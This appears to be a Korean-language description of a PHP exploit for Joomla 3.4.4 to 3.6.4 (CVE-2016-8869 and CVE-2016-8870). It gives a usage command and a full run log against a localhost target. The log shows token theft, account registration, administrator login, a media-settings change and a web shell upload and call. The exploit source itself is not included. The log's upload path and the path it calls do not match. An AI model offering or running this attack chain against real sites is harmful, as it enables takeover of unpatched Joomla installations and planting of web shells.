
Joomla 3.4.4 - 3.6.4용 익스플로잇 (CVE-2016-8869 및 CVE-2016-8870)
Joomla 3.4.4 - 3.6.4용 익스플로잇 (CVE-2016-8869 및 CVE-2016-8870) - 파일 업로드 웹 셸 포함
이것은 PHP 포트이며, 원본 python 소스 코드는 다음에서 제공되었습니다: @link https://github.com/XiphosResearch/exploits/tree/master/Joomraa
사용법: php exploit.php --username hacker -p password -e [email protected] http://localhost:9994/
[0.000] 부팅 중... [0.000] 대상: http://localhost:9994 [0.000] [-] 토큰 가져오는 중 [0.464] ..fetch | GET | /index.php/component/users/?view=login | 200 [0.464] 토큰 | 6cebed4c64eae7e8915b0bc7e0ca354e [0.464] [-] 사용자 계정 생성 중 [0.760] ..fetch | POST | /index.php/component/users/?task=user.register | 303 [0.760] [!] 계정이 생성되지 않았거나 이미 존재합니다 [0.760] [-] 관리자 로그인용 토큰 가져오는 중 [1.113] ..fetch | GET | /administrator/index.php | 200 [1.113] 토큰 | af3c362c9aa19347451656d2d24b79f2 [1.113] [-] 관리자로 로그인 중 [2.368] ..fetch | POST | /administrator/index.php | 200 [2.368] [+] 관리자 로그인 성공! [2.368] [+] 미디어 옵션 가져오는 중 [3.221] ..fetch | GET | /administrator/index.php?option=com_config&view=component&component=com_media&path= | 200 [4.470] ..fetch | POST | /administrator/index.php?option=com_config | 200 [4.470] [] 셸 업로드 [5.329] ..fetch | GET | /administrator/index.php?option=com_media&folder= | 200 [5.330] [-] 다음 경로에 익스플로잇 업로드 중 | /images/1k8iusc.pht [6.415] ..fetch | POST | http://localhost:9994/administrator/index.php?option=com_media&task=file.upload&tmpl=component&ed5766f9587758a07f90d6b1ba846723=r2pci9ua7bao40na38foiq7da7&b5dab50228f1e955bae66d8950cc29a7=1&format=html | 200 [6.415] [] 익스플로잇 호출 중 [6.417] ..fetch | GET | /1.php | 200 [6.417] [$] 익스플로잇 성공!